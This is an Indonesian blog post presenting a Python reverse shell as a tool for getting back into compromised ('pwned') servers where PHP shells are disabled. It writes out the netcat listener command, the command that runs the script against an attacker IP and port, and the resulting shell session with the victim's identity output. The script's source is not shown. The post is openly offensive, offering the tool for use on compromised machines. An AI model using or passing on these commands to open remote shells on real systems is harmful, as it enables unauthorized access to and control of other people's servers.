reverse shell written in python
September 24, 2010 Leave a comment
sedikit hasil coding dengan cara seksama dan dalam tempo yang sesingkat2nya
, reverse shell, bisa digunakan dan dikembangkan sebagai alternatif jika bertemu pwned server yang didisable untuk php shell
untuk penggunaanya disiapkan dulu listening port nya, misal:
nc -l 12345
contoh penggunaan:
di box kita:
r3dsh4d0w@deepmind:~$ nc -l 12345
di box yang mengeksekusi reverseshell:
akfsec@Indonesia:~/program/python$ id uid=1000(akfsec) gid=1000(akfsec) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(akfsec) akfsec@Indonesia:~/program/python$ ./reverseshell.py 192.168.1.2 12345
hasil di box listen:
r3dsh4d0w@deepmind:~$ nc -l 12345 w00t!!, succesfully connected please wait while getting the prompt Enjoy dude... id uid=1000(akfsec) gid=1000(akfsec) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(akfsec)
untuk sourcenya:
Read more of this post
Recent Comments